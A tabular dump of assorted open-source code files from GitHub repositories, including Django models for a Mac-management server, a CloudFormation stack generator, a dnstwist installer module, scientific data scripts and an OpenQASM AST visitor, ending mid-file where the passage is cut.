max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
betting.py | Carterbouley/football-predictor | 189 | 11177898 | def test_betting_stategy(predictions, test_features, test_labels, bet_difference=0.05):
result = {
'spend': 0,
'return': 0,
}
for i in range(0, len(predictions)):
probabilities = predictions[i]['probabilities']
if probabilities[1] > (1 / test_features['odds-draw'][i]) + bet_difference:
result['spend'] = result['spend'] + 1
if test_labels[i] == 'D':
result['return'] = result['return'] + test_features['odds-draw'][i]
result['performance'] = result['return'] / result['spend']
return result
|
examples/ranking_others.py | khalillakhdhar/recommander_python | 407 | 11177912 | """
Running item recommendation algorithms
"""
from caserec.recommenders.item_recommendation.bprmf import BprMF
tr = '../../datasets/ml-100k/folds/0/train.dat'
te = '../../datasets/ml-100k/folds/0/test.dat'
BprMF(tr, te, batch_size=30).compute()
|
server/models.py | nathandarnell/sal | 215 | 11177918 | import plistlib
import random
import string
from datetime import datetime
from xml.parsers.expat import ExpatError
import pytz
from dateutil.parser import parse
from ulid2 import generate_ulid_as_uuid
from django.contrib.auth.models import User
from django.db import models
from django.utils import timezone
from utils import text_utils
OS_CHOICES = (
('Darwin', 'macOS'),
('Windows', 'Windows'),
('Linux', 'Linux'),
('ChromeOS', 'Chrome OS'),
)
REPORT_CHOICES = (
('base64', 'base64'),
('base64bz2', 'base64bz2'),
('bz2', 'bz2'),
)
class ProfileLevel():
stats_only = 'SO'
read_only = 'RO'
read_write = 'RW'
global_admin = 'GA'
def GenerateKey():
key = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(128))
try:
MachineGroup.objects.get(key=key)
return GenerateKey()
except MachineGroup.DoesNotExist:
return key
def GenerateAPIKey():
key = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(24))
try:
ApiKey.objects.get(public_key=key)
return GenerateAPIKey()
except ApiKey.DoesNotExist:
return key
class UserProfile(models.Model):
user = models.OneToOneField(User, unique=True, on_delete=models.CASCADE)
LEVEL_CHOICES = (
('SO', 'Stats Only'),
('RO', 'Read Only'),
('RW', 'Read Write'),
('GA', 'Global Admin'),
)
level = models.CharField(max_length=2, choices=LEVEL_CHOICES, default='RO')
def __str__(self):
return self.user.username
User.userprofile = property(lambda u: UserProfile.objects.get_or_create(user=u)[0])
class BusinessUnit(models.Model):
name = models.CharField(max_length=100)
users = models.ManyToManyField(User, blank=True)
def __str__(self):
return self.name
@classmethod
def display_name(cls):
return text_utils.class_to_title(cls.__name__)
class Meta:
ordering = ['name']
class MachineGroup(models.Model):
business_unit = models.ForeignKey(BusinessUnit, on_delete=models.CASCADE)
name = models.CharField(max_length=100)
key = models.CharField(db_index=True, max_length=255, unique=True,
blank=True, null=True, editable=False)
def save(self, **kwargs):
if not self.id:
self.key = GenerateKey()
super(MachineGroup, self).save()
def __str__(self):
return self.name
@classmethod
def display_name(cls):
return text_utils.class_to_title(cls.__name__)
class Meta:
ordering = ['name']
class DeployedManager(models.Manager):
def get_queryset(self):
return super(DeployedManager, self).get_queryset().filter(deployed=True)
class Machine(models.Model):
id = models.BigAutoField(primary_key=True)
machine_group = models.ForeignKey(MachineGroup, on_delete=models.CASCADE)
sal_version = models.CharField(db_index=True, null=True, blank=True, max_length=255)
deployed = models.BooleanField(default=True)
broken_client = models.BooleanField(default=False)
last_checkin = models.DateTimeField(db_index=True, blank=True, null=True)
first_checkin = models.DateTimeField(db_index=True, blank=True, null=True, auto_now_add=True)
serial = models.CharField(db_index=True, max_length=100, unique=True)
hostname = models.CharField(max_length=256, null=True, blank=True)
operating_system = models.CharField(db_index=True, max_length=256, null=True, blank=True)
memory = models.CharField(db_index=True, max_length=256, null=True, blank=True)
memory_kb = models.IntegerField(db_index=True, default=0)
hd_space = models.BigIntegerField(db_index=True, null=True, blank=True)
hd_total = models.BigIntegerField(db_index=True, null=True, blank=True)
hd_percent = models.CharField(max_length=256, null=True, blank=True)
console_user = models.CharField(max_length=256, null=True, blank=True)
machine_model = models.CharField(db_index=True, max_length=256, null=True, blank=True)
machine_model_friendly = models.CharField(db_index=True, max_length=256, null=True, blank=True)
cpu_type = models.CharField(max_length=256, null=True, blank=True)
cpu_speed = models.CharField(max_length=256, null=True, blank=True)
os_family = models.CharField(db_index=True, max_length=256,
choices=OS_CHOICES, verbose_name="OS Family", default="Darwin")
munki_version = models.CharField(db_index=True, max_length=256, null=True, blank=True)
manifest = models.CharField(db_index=True, max_length=256, null=True, blank=True)
objects = models.Manager() # The default manager.
deployed_objects = DeployedManager()
def get_fields(self):
return [(field.name, field.value_to_string(self)) for field in Machine._meta.fields]
def __str__(self):
if self.hostname:
return self.hostname
else:
return self.serial
@classmethod
def display_name(cls):
return text_utils.class_to_title(cls.__name__)
class Meta:
ordering = ['hostname']
GROUP_NAMES = {
'all': None,
'machine_group': MachineGroup,
'business_unit': BusinessUnit,
'machine': Machine}
class PluginScriptSubmission(models.Model):
id = models.BigAutoField(primary_key=True)
machine = models.ForeignKey(Machine, on_delete=models.CASCADE)
plugin = models.CharField(max_length=255)
historical = models.BooleanField(default=False)
recorded = models.DateTimeField(auto_now_add=True)
def __str__(self):
return '%s: %s' % (self.machine, self.plugin)
class Meta:
ordering = ['recorded', 'plugin']
class PluginScriptRow(models.Model):
id = models.BigAutoField(primary_key=True)
submission = models.ForeignKey(PluginScriptSubmission, on_delete=models.CASCADE)
pluginscript_name = models.TextField()
pluginscript_data = models.TextField(blank=True, null=True)
pluginscript_data_string = models.TextField(blank=True, null=True)
pluginscript_data_int = models.IntegerField(default=0)
pluginscript_data_date = models.DateTimeField(blank=True, null=True)
submission_and_script_name = models.TextField()
def save(self):
try:
self.pluginscript_data_int = int(self.pluginscript_data)
except (ValueError, TypeError):
self.pluginscript_data_int = 0
self.pluginscript_data_string = str(self.pluginscript_data)
try:
date_data = parse(self.pluginscript_data)
if not date_data.tzinfo:
date_data = date_data.replace(tzinfo=pytz.UTC)
self.pluginscript_data_date = date_data
except ValueError:
# Try converting it to an int if we're here
try:
if int(self.pluginscript_data) != 0:
try:
self.pluginscript_data_date = datetime.fromtimestamp(
int(self.pluginscript_data), tz=pytz.UTC)
except (ValueError, TypeError):
self.pluginscript_data_date = None
else:
self.pluginscript_data_date = None
except (ValueError, TypeError):
self.pluginscript_data_date = None
super(PluginScriptRow, self).save()
def __str__(self):
return '%s: %s' % (self.pluginscript_name, self.pluginscript_data)
class Meta:
ordering = ['pluginscript_name']
class Plugin(models.Model):
name = models.CharField(max_length=255, unique=True)
order = models.IntegerField()
def __str__(self):
return self.name
class Meta:
ordering = ['order']
class MachineDetailPlugin(models.Model):
name = models.CharField(max_length=255, unique=True)
order = models.IntegerField()
def __str_(self):
return self.name
class Meta:
ordering = ['order']
class Report(models.Model):
name = models.CharField(max_length=255, unique=True)
def __str__(self):
return self.name
class Meta:
ordering = ['name']
class SalSetting(models.Model):
name = models.CharField(max_length=255, unique=True)
value = models.TextField()
def __str__(self):
return self.name
class ApiKey(models.Model):
public_key = models.CharField(max_length=255)
private_key = models.CharField(max_length=255)
name = models.CharField(max_length=255)
has_been_seen = models.BooleanField(default=False)
read_write = models.BooleanField(default=False)
def save(self, *args, **kwargs):
if not self.id:
self.public_key = GenerateAPIKey()
self.private_key = ''.join(random.choice(
string.ascii_lowercase + string.digits) for x in range(64))
super(ApiKey, self).save(*args, **kwargs)
def __str__(self):
return self.name
class Meta:
ordering = ['name']
unique_together = ("public_key", "private_key")
class FriendlyNameCache(models.Model):
serial_stub = models.CharField(max_length=5)
friendly_name = models.CharField(max_length=255)
class ManagementSource(models.Model):
id = models.UUIDField(default=generate_ulid_as_uuid, primary_key=True)
name = models.CharField(max_length=255, unique=True)
def __str__(self):
return self.name
STATUS_CHOICES = (
('PRESENT', 'Present'),
('ABSENT', 'Absent'),
('PENDING', 'Pending'),
('ERROR', 'Error'),
('UNKNOWN', 'Unknown'),
)
class ManagedItem(models.Model):
id = models.UUIDField(default=generate_ulid_as_uuid, primary_key=True)
name = models.CharField(max_length=255)
machine = models.ForeignKey(Machine, on_delete=models.CASCADE)
management_source = models.ForeignKey(ManagementSource, on_delete=models.CASCADE)
date_managed = models.DateTimeField(default=timezone.now)
status = models.CharField(max_length=7, choices=STATUS_CHOICES, default='UNKNOWN')
data = models.TextField(editable=True, null=True)
class Meta:
unique_together = (("machine", "name", "management_source"),)
ordering = ['id']
class ManagedItemHistory(models.Model):
id = models.UUIDField(default=generate_ulid_as_uuid, primary_key=True)
recorded = models.DateTimeField()
name = models.CharField(max_length=255)
machine = models.ForeignKey(Machine, on_delete=models.CASCADE)
management_source = models.ForeignKey(ManagementSource, on_delete=models.CASCADE)
status = models.CharField(max_length=7, choices=STATUS_CHOICES, default='UNKNOWN')
class Meta:
unique_together = (("machine", "name", "management_source", "recorded"),)
ordering = ['-recorded']
def __str__(self):
return (
f"{self.machine}: {self.management_source.name} {self.name} {self.status} "
f"{self.recorded}")
class Fact(models.Model):
id = models.BigAutoField(primary_key=True)
machine = models.ForeignKey(Machine, related_name='facts', on_delete=models.CASCADE)
management_source = models.ForeignKey(
ManagementSource, related_name='facts', on_delete=models.CASCADE, null=True)
fact_name = models.TextField()
fact_data = models.TextField()
def __str__(self):
return '%s: %s' % (self.fact_name, self.fact_data)
class Meta:
ordering = ['fact_name']
class HistoricalFact(models.Model):
id = models.BigAutoField(primary_key=True)
machine = models.ForeignKey(Machine, related_name='historical_facts', on_delete=models.CASCADE)
management_source = models.ForeignKey(
ManagementSource, related_name='historical_facts', on_delete=models.CASCADE, null=True)
fact_name = models.CharField(max_length=255)
fact_data = models.TextField()
fact_recorded = models.DateTimeField()
def __str__(self):
return self.fact_name
class Meta:
ordering = ['fact_name', 'fact_recorded']
class Message(models.Model):
id = models.BigAutoField(primary_key=True)
machine = models.ForeignKey(Machine, related_name='messages', on_delete=models.CASCADE)
management_source = models.ForeignKey(
ManagementSource, related_name='messages', on_delete=models.CASCADE, null=True)
text = models.TextField(blank=True, null=True)
date = models.DateTimeField(default=timezone.now)
MESSAGE_TYPES = (
('ERROR', 'Error'),
('WARNING', 'Warning'),
('OTHER', 'Other'),
('DEBUG', 'Debug'),
)
message_type = models.CharField(max_length=7, choices=MESSAGE_TYPES, default='OTHER')
|
modules/intelligence-gathering/dnstwist.py | decidedlygray/ptf | 4,391 | 11177928 | #!/usr/bin/env python
#####################################
# Installation module for dnstwist
#####################################
# AUTHOR OF MODULE NAME
AUTHOR="<NAME> (ninewires)"
# DESCRIPTION OF THE MODULE
DESCRIPTION="This module will install/update dnstwist - Domain name permutation engine for detecting homograph phishing attacks, typo squatting, and brand impersonation"
# INSTALL TYPE GIT, SVN, FILE DOWNLOAD
# OPTIONS = GIT, SVN, FILE
INSTALL_TYPE="GIT"
# LOCATION OF THE FILE OR GIT/SVN REPOSITORY
REPOSITORY_LOCATION=""
# WHERE DO YOU WANT TO INSTALL IT
INSTALL_LOCATION="dnstwist"
# DEPENDS FOR DEBIAN INSTALLS
DEBIAN="git,python-pip,python3-dnspython python3-tld python3-geoip python3-whois python3-requests python3-ssdeep"
# DEPENDS FOR FEDORA INSTALLS
FEDORA="git,python-pip"
# COMMANDS TO RUN AFTER
AFTER_COMMANDS="cd {INSTALL_LOCATION},python3 -m pip install -r requirements.txt"
# CREATE LAUNCHER
LAUNCHER="dnstwist"
|
resources.py | lokitold/lambdachat | 416 | 11177948 | #!/usr/bin/env python
"""
Script to generate a CloudFormation Template that brings up all of the AWS
resources needed to run lambda-chat
This requires Python 2.7. To get the required libraries:
sudo pip install docopt boto troposphere awacs pyyaml --upgrade
Usage:
resources.py cf
resources.py launch --region=<region> --profile=<profile>
resources.py update --region=<region> --profile=<profile>
resources.py delete --region=<region> --profile=<profile>
resources.py output --region=<region> --profile=<profile>
Options:
-h --help Show this screen.
--version Show version.
--region=<region> The AWS region to use
--profile=<profile> The AWS credential profile to use
License:
Copyright 2015 CloudNative, Inc.
https://cloudnative.io/
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# Import all the goodness
import sys
from docopt import docopt
import yaml
from boto import cloudformation
from troposphere import Template, Parameter, Output
from troposphere import GetAtt, Ref, Join
import troposphere.iam as iam
import troposphere.sns as sns
import troposphere.s3 as s3
from awacs.aws import Action, Allow, Policy, Statement, Principal, Condition, StringEquals, AWSPrincipal
def default_config():
"""
Returns a dict with the default configuration
"""
return {
'stack_name': 'Lambda-Chat',
'tags': {
'Name': 'Lambda Chat',
'Creator': 'CloudNative'
}
}
def load_config():
"""
Returns the default config merged with the what is in the config.yml file
"""
try:
# Attempt to load configuration file
stream = file('config.yml', 'r')
config = yaml.load(stream)
config['loaded'] = True
except IOError:
config = {}
config['loaded'] = False
# Merge with default
return dict(default_config().items() + config.items())
def assert_config_loaded():
"""
Stops execution and displays an error message if the settings have not
been loaded from config.yml
"""
if not config['loaded']:
print('ERROR: Could not load file: config.yml')
sys.exit(1)
def cf_params():
"""
Returns the parameters needed to create or update the CloudFormation
stack
"""
assert_config_loaded()
return [
('GoogleOAuthClientID', config['google_oauth_client_id']),
('WebsiteS3BucketName', config['s3_bucket']),
]
def generate_cf_template():
"""
Returns an entire CloudFormation stack by using troposphere to construct
each piece
"""
# Header of CloudFormation template
t = Template()
t.add_version("2010-09-09")
t.add_description("Lambda Chat AWS Resources")
# Paramters
description = "should match [0-9]+-[a-z0-9]+.apps.googleusercontent.com"
google_oauth_client_id = t.add_parameter(Parameter(
"GoogleOAuthClientID",
AllowedPattern="[0-9]+-[a-z0-9]+.apps.googleusercontent.com",
Type="String",
Description="The Client ID of your Google project",
ConstraintDescription=description
))
website_s3_bucket_name = t.add_parameter(Parameter(
"WebsiteS3BucketName",
AllowedPattern="[a-zA-Z0-9\-]*",
Type="String",
Description="Name of S3 bucket to store the website in",
ConstraintDescription="can contain only alphanumeric characters and dashes.",
))
# The SNS topic the website will publish chat messages to
website_sns_topic = t.add_resource(sns.Topic(
'WebsiteSnsTopic',
TopicName='lambda-chat',
DisplayName='Lambda Chat'
))
t.add_output(Output(
"WebsiteSnsTopic",
Description="sns_topic_arn",
Value=Ref(website_sns_topic),
))
# The IAM Role and Policy the website will assume to publish to SNS
website_role = t.add_resource(iam.Role(
"WebsiteRole",
Path="/",
AssumeRolePolicyDocument=Policy(
Statement=[
Statement(
Effect=Allow,
Action=[Action("sts", "AssumeRoleWithWebIdentity")],
Principal=Principal("Federated", "accounts.google.com"),
Condition=Condition(
StringEquals(
"accounts.google.com:aud",
Ref(google_oauth_client_id)
)
),
),
],
),
))
t.add_resource(iam.PolicyType(
"WebsitePolicy",
PolicyName="lambda-chat-website-policy",
Roles=[Ref(website_role)],
PolicyDocument=Policy(
Version="2012-10-17",
Statement=[
Statement(
Effect=Allow,
Action=[Action("sns", "Publish")],
Resource=[
Ref(website_sns_topic)
],
),
],
)
))
t.add_output(Output(
"WebsiteRole",
Description="website_iam_role_arn",
Value=GetAtt(website_role, "Arn"),
))
website_bucket = t.add_resource(s3.Bucket(
'WebsiteS3Bucket',
BucketName=Ref(website_s3_bucket_name),
WebsiteConfiguration=s3.WebsiteConfiguration(
ErrorDocument="error.html",
IndexDocument="index.html"
)
))
t.add_output(Output(
"S3Bucket",
Description="s3_bucket",
Value=Ref(website_bucket),
))
t.add_resource(s3.BucketPolicy(
'WebsiteS3BucketPolicy',
Bucket=Ref(website_bucket),
PolicyDocument={
"Version": "2012-10-17",
"Statement": [
{
"Sid": "PublicAccess",
"Effect": "Allow",
"Principal": "*",
"Action": ["s3:GetObject"],
"Resource": [{
"Fn::Join": [
"",
[
"arn:aws:s3:::",
{
"Ref": "WebsiteS3Bucket",
},
"/*"
]
]
}]
}
]
}
))
return t
def launch(args, config, cf_conn, template):
"""
Create new CloudFormation Stack from the template
"""
print("Creating CloudFormation Stack %s..." % config['stack_name'])
stack_id = cf_conn.create_stack(
config['stack_name'],
template_body=template.to_json(),
parameters=cf_params(),
tags=config['tags'],
capabilities=['CAPABILITY_IAM']
)
print('Created ' + stack_id)
def update(args, config, cf_conn, template):
"""
Update an existing CloudFormation Stack
"""
print("Updating CloudFormation Stack %s..." % config['stack_name'])
stack_id = cf_conn.update_stack(
config['stack_name'],
template_body=template.to_json(),
parameters=cf_params(),
tags=config['tags'],
capabilities=['CAPABILITY_IAM']
)
print('Updated ' + stack_id)
def delete(args, config, cf_conn):
"""
Deletes an existing CloudFormation Stack
"""
# Delete an existing CloudFormation Stack with same name
print("Deleting CloudFormation Stack %s..." % config['stack_name'])
resp = cf_conn.delete_stack(
config['stack_name'],
)
print(resp)
def output(args, config, cf_conn):
"""
Describes a CloudFormation Stack and prints the outputs
"""
print("Describing CloudFormation Stack %s..." % config['stack_name'])
resp = conn.describe_stacks(
config['stack_name']
)
print('---');
print('region: %s' % args['--region'])
for output in resp[0].outputs:
print("%s: %s" % (output.description, output.value))
if __name__ == '__main__':
args = docopt(__doc__, version='Lambda Chat AWS Resources 0.2')
config = load_config()
print_cf_template = args['cf'] or args['launch']
try:
if print_cf_template:
template = generate_cf_template()
print(template.to_json())
if (args['cf']):
sys.exit(1)
# Get a connection to AWS CloudFormation in the given region
conn = cloudformation.connect_to_region(
args['--region'], profile_name=args['--profile'])
if (args['launch']):
launch(args, config, conn, template)
elif (args['update']):
update(args, config, conn, template)
elif (args['delete']):
delete(args, config, conn)
elif (args['output']):
output(args, config, conn)
except Exception, e:
print('ERROR')
print(e)
print(e.message)
|
scripts/unfuck-path.py | kasymovga/taisei | 573 | 11177969 | #!/usr/bin/env python3
from taiseilib.common import (
run_main,
)
from pathlib import Path, PureWindowsPath, PurePosixPath
import sys
def main(args):
import argparse
parser = argparse.ArgumentParser(description='Because Windows is the worst.', prog=args[0])
parser.add_argument('path',
help='the path to operate on'
)
parser.add_argument('--from-windows',
action='store_true',
help='interpret source as a Windows path (default: POSIX path)'
)
parser.add_argument('--to-windows',
action='store_true',
help='output a Windows path (default: POSIX path)'
)
parser.add_argument('--escape-backslashes',
action='store_true',
help='escape any backslashes in the output'
)
args = parser.parse_args(args[1:])
if args.from_windows:
path = PureWindowsPath(args.path)
else:
path = PurePosixPath(args.path)
if args.to_windows:
out = str(PureWindowsPath(path))
else:
out = path.as_posix()
if args.escape_backslashes:
out = out.replace('\\', '\\\\')
sys.stdout.write(out)
if __name__ == '__main__':
run_main(main)
|
env/lib/python3.4/site-packages/bulbs/tests/gremlin_tests.py | mudbungie/NetExplorer | 234 | 11177989 | import unittest
from .testcase import BulbsTestCase
class GremlinTestCase(BulbsTestCase):
def setUp(self):
# self.client = RexsterClient()
# self.vertex_type = "vertex"
# self.edge_type = "edge"
#raise NotImplemented
pass
def test_gremlin(self):
# limiting return count so we don't exceed heap size
resp = self.client.gremlin("g.V[0..9]")
assert resp.total_size > 5
|
esmvaltool/cmorizers/obs/cmorize_obs_ceres_ebaf.py | cffbots/ESMValTool | 148 | 11178019 | <filename>esmvaltool/cmorizers/obs/cmorize_obs_ceres_ebaf.py<gh_stars>100-1000
"""ESMValTool CMORizer for CERES-EBAF data.
Tier
Tier 2: other freely-available dataset.
Source
https://ceres-tool.larc.nasa.gov/ord-tool/jsp/EBAF4Selection.jsp
Last access
20191126
Download and processing instructions
Select: "TOA Fluxes" ("Shortwave Flux" and "Longwave Flux", "All Sky"
and "Clear Sky"), "Monthly Mean", "Regional 1x1 global grid".
"""
import logging
import os
import warnings
import iris
from . import utilities as utils
logger = logging.getLogger(__name__)
def filter_warnings():
"""Filter certain :mod:`iris` warnings."""
for msg in ('min', 'max'):
warnings.filterwarnings(
'ignore',
message=f"WARNING: valid_{msg} not used",
category=UserWarning,
module='iris',
)
def _extract_variable(short_name, var, cfg, filepath, out_dir):
"""Extract variable."""
raw_var = var.get('raw', short_name)
with warnings.catch_warnings():
filter_warnings()
cube = iris.load_cube(filepath, utils.var_name_constraint(raw_var))
# Fix units
cmor_info = cfg['cmor_table'].get_variable(var['mip'], short_name)
utils.convert_timeunits(cube, 1950)
# Fix coordinates
utils.fix_coords(cube)
# Fix metadata
attrs = cfg['attributes']
attrs['mip'] = var['mip']
utils.fix_var_metadata(cube, cmor_info)
utils.set_global_atts(cube, attrs)
# Save variable
with warnings.catch_warnings():
filter_warnings()
utils.save_variable(cube,
short_name,
out_dir,
attrs,
unlimited_dimensions=['time'])
def cmorization(in_dir, out_dir, cfg, _):
"""Cmorization func call."""
raw_filepath = os.path.join(in_dir, cfg['filename'])
# Run the cmorization
for (short_name, var) in cfg['variables'].items():
logger.info("CMORizing variable '%s'", short_name)
_extract_variable(short_name, var, cfg, raw_filepath, out_dir)
|
Examples/AppKit/Todo/ToDoCell.py | Khan/pyobjc-framework-Cocoa | 132 | 11178050 | <gh_stars>100-1000
from Cocoa import *
NOT_DONE=0
DONE=1
DEFERRED=2
class ToDoCell (NSButtonCell):
__slots__ = ('_triState', '_doneImage', '_deferredImage', '_timeDue' )
def init(self):
self._triState = NOT_DONE
self._timeDue = None
self._doneImage = None
self._deferredImage = None
NSButtonCell.initTextCell_(self, "")
self.setType_(NSToggleButton)
self.setImagePosition_(NSImageLeft)
self.setBezelStyle_(NSShadowlessSquareBezelStyle)
self.setFont_(NSFont.userFontOfSize_(10))
self.setAlignment_(NSRightTextAlignment)
self._doneImage = NSImage.imageNamed_("DoneMark")
self._deferredImage = NSImage.imageNamed_("DeferredMark")
return self
@objc.typedAccessor('i')
def setTriState_(self, newState):
if newState > DEFERRED:
self._triState = NOT_DONE
else:
self._triState = newState
self.updateImage()
@objc.typedAccessor('i')
def triState(self):
return self._triState
def setState_(self, val):
pass
def state(self):
if self._triState == DEFERRED:
return DONE
else:
return self._triState
def updateImage(self):
if self._triState == NOT_DONE:
#print "NO IMAGE"
self.setImage_(None)
elif self._triState == DONE:
#print "DONE IMAGE"
self.setImage_(self._doneImage)
elif self._triState == DEFERRED:
#print "DEFERRED IMAGE"
self.setImage_(self._deferredImage)
self.controlView().updateCell_(self)
def startTrackingAt_inView_(self, startPoint, controlView):
#print "startTracking:", startPoint, controlView
return 1
def stopTracking_at_inView_mouseIsUp_(self, lastPoint, stopPoint, controlView, flag):
#print "stopTracking:", lastPoint, stopPoint, controlView, flag, self.triState()
if flag:
self.setTriState_(self.triState() + 1)
def setTimeDue_(self, newTime):
if newTime:
self._timeDue = newTime
self.setTitle_(self._timeDue.descriptionWithCalendarFormat_timeZone_locale_("%I:%M %p", NSTimeZone.localTimeZone(), None))
else:
self._timeDue = None
self.setTitle_("-->")
def timeDue(self):
return self._timeDue
|
ttskit/makefile.py | shuahs/ttskit | 247 | 11178065 | from pathlib import Path
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(Path(__file__).stem)
import os
import datetime
def make_document():
"""生成模块脚本的说明文档。"""
code_dir = Path(__file__).parent
doc_path = code_dir.joinpath('document.txt')
with doc_path.open('wt', encoding='utf8') as fout:
fout.write(f'## {code_dir.name}\n\n')
for py_file in sorted(code_dir.glob('**/*.py')):
if py_file.stem == '__init__':
py_name = py_file.parent.relative_to(code_dir).__str__().replace('\\', '/')
else:
py_name = py_file.relative_to(code_dir).__str__()[:-3].replace('\\', '/')
doc_path.open('at', encoding='utf8').write(f'### {py_name}\n')
module_name = py_name.replace('/', '.')
os.system(f'python -m pydoc {module_name} >> {doc_path}')
doc_path.open('at', encoding='utf8').write('\n')
lines = doc_path.open('rt', encoding='utf8').readlines()
with doc_path.open('wt', encoding='utf8') as fout:
for line in lines:
if line.startswith('[0m'):
logger.info(repr(line))
fout.write(line[4:])
continue
fout.write(line)
logger.info('Make document.txt done.')
def make_help():
"""生成运行项目的帮助文档。"""
code_dir = Path(__file__).parent
doc_path = code_dir.joinpath('help.txt')
with open(doc_path, 'wt', encoding='utf8') as fout:
fout.write(f'## {code_dir.name}\n\n')
for py_file in sorted(code_dir.glob('*.py')):
py_name = py_file.relative_to(code_dir).__str__()[:-3].replace('\\', '/')
doc_path.open('at', encoding='utf8').write(f'### {py_name}\n')
os.system(f'python {py_name}.py --help >> {doc_path}')
doc_path.open('at', encoding='utf8').write('\n\n')
lines = doc_path.open('rt', encoding='utf8').readlines()
with doc_path.open('wt', encoding='utf8') as fout:
for line in lines:
if line.startswith('[0m'):
logger.info(repr(line))
fout.write(line[4:])
continue
fout.write(line)
logger.info('Make help.txt done.')
def make_requirements():
"""生成项目的依赖包。"""
os.system('pipreqs . --encoding=utf8 --force')
reqs = sorted(open('requirements.txt').readlines(), key=lambda x: x.lower())
with open('requirements.txt', 'wt', encoding='utf8') as fout:
for line in reqs:
if line.startswith('~'):
fout.write(f'# {line}')
else:
fout.write(line)
logger.info('Make requirements.txt done.')
def make_gitignore():
"""生成git项目的忽略列表。"""
with open('.gitignore', 'wt', encoding='utf8') as fout:
for line in '.idea .git __pycache__ venv static log'.split():
fout.write(f'{line}\n')
logger.info('Make .gitignore done.')
def make_readme():
"""生成README文档。"""
if Path('README.md').is_file():
with open('README.md', 'at', encoding='utf8') as fout:
version = datetime.datetime.now().strftime('%y.%m.%d')[1:].replace('.0', '.')
fout.write(f'\n### v{version}\n')
else:
with open('README.md', 'wt', encoding='utf8') as fout:
fout.write(f'## {Path(__file__).parent.name}\n\n')
fout.write(f'## 版本\n')
version = datetime.datetime.now().strftime('%y.%m.%d')[1:].replace('.0', '.')
fout.write(f'\n### v{version}\n')
logger.info('Make README.md done.')
def pip_install_requirements(reqspath=''):
reqspath = reqspath or 'requirements.txt'
for line in open(reqspath, encoding='utf8'):
pkg = line.strip()
os.system(f'pip install {pkg}')
logger.info(f'pip install {pkg} done.')
if __name__ == "__main__":
logger.info(__file__)
import sys
if len(sys.argv) == 2:
pip_install_requirements(sys.argv[1])
else:
pip_install_requirements()
# make_requirements()
# make_gitignore()
# make_readme()
# make_help()
# make_document()
|
Chapter11/CreateDataLake.py | VinushaVemuri/learn | 185 | 11178095 | from faker import Faker
import json
import os
os.chdir("/home/paulcrickard/datalake")
fake=Faker()
userid=1
for i in range(1000):
name=fake.name()
fname=name.replace(" ","-")+'.json'
data={
"userid":userid,
"name":name,
"age":fake.random_int(min=18, max=101, step=1),
"street":fake.street_address(),
"city":fake.city(),
"state":fake.state(),
"zip":fake.zipcode()
}
datajson=json.dumps(data)
output=open(fname,'w')
userid+=1
output.write(datajson)
output.close()
|
test/hlt/pytest/python/com/huawei/iotplatform/client/dto/NotifyFwUpgradeResultDTO.py | yuanyi-thu/AIOT- | 128 | 11178111 | class NotifyFwUpgradeResultDTO(object):
def __init__(self):
self.notifyType = None
self.deviceId = None
self.appId = None
self.operationId = None
self.subOperationId = None
self.curVersion = None
self.targetVersion = None
self.sourceVersion = None
self.Status = None
self.statusDesc = None
self.upgradeTime = None
def getNotifyType(self):
return self.notifyType
def setNotifyType(self, notifyType):
self.notifyType = notifyType
def getDeviceId(self):
return self.deviceId
def setDeviceId(self, deviceId):
self.deviceId = deviceId
def getAppId(self):
return self.appId
def setAppId(self, appId):
self.appId = appId
def getOperationId(self):
return self.operationId
def setOperationId(self, operationId):
self.operationId = operationId
def getSubOperationId(self):
return self.subOperationId
def setSubOperationId(self, subOperationId):
self.subOperationId = subOperationId
def getCurVersion(self):
return self.curVersion
def setCurVersion(self, curVersion):
self.curVersion = curVersion
def getTargetVersion(self):
return self.targetVersion
def setTargetVersion(self, targetVersion):
self.targetVersion = targetVersion
def getSourceVersion(self):
return self.sourceVersion
def setSourceVersion(self, sourceVersion):
self.sourceVersion = sourceVersion
def getStatus(self):
return self.Status
def setStatus(self, Status):
self.Status = Status
def getStatusDesc(self):
return self.statusDesc
def setStatusDesc(self, statusDesc):
self.statusDesc = statusDesc
def getUpgradeTime(self):
return self.upgradeTime
def setUpgradeTime(self, upgradeTime):
self.upgradeTime = upgradeTime
|
source/openqasm/visitor.py | shiyunon/openqasm | 603 | 11178159 | <reponame>shiyunon/openqasm<filename>source/openqasm/visitor.py
from typing import Optional, TypeVar, Generic
from openqasm.ast import QASMNode
T = TypeVar("T")
class QASMVisitor(Generic[T]):
"""
A node visitor base class that walks the abstract syntax tree and calls a
visitor function for every node found. This function may return a value
which is forwarded by the `visit` method.
Modified from the implementation in ast.py in the Python standard library.
We added the context argument to the visit method. It allows the visitor
to hold temporary state while visiting the nodes.
The optional context argument in visit/generic_visit methods can be used to hold temporary
information that we do not want to hold in either the AST or the visitor themselves.
"""
def visit(self, node: QASMNode, context: Optional[T] = None):
"""Visit a node."""
method = "visit_" + node.__class__.__name__
visitor = getattr(self, method, self.generic_visit)
# The visitor method may not have the context argument.
if context:
return visitor(node, context)
else:
return visitor(node)
def generic_visit(self, node: QASMNode, context: Optional[T] = None):
"""Called if no explicit visitor function exists for a node."""
for value in node.__dict__.values():
if not isinstance(value, list):
value = [value]
for item in value:
if isinstance(item, QASMNode):
if context:
self.visit(item, context)
else:
self.visit(item)
class QASMTransformer(QASMVisitor[T]):
"""
A :class:`QASMVisitor` subclass that walks the abstract syntax tree and
allows modification of nodes.
Modified from the implementation in ast.py in the Python standard library
"""
def generic_visit(self, node: QASMNode, context: Optional[T] = None) -> QASMNode:
for field, old_value in node.__dict__.items():
if isinstance(old_value, list):
new_values = []
for value in old_value:
if isinstance(value, QASMNode):
value = self.visit(value, context) if context else self.visit(value)
if value is None:
continue
elif not isinstance(value, QASMNode):
new_values.extend(value)
continue
new_values.append(value)
old_value[:] = new_values
elif isinstance(old_value, QASMNode):
new_node = self.visit(old_value, context) if context else self.visit(old_value)
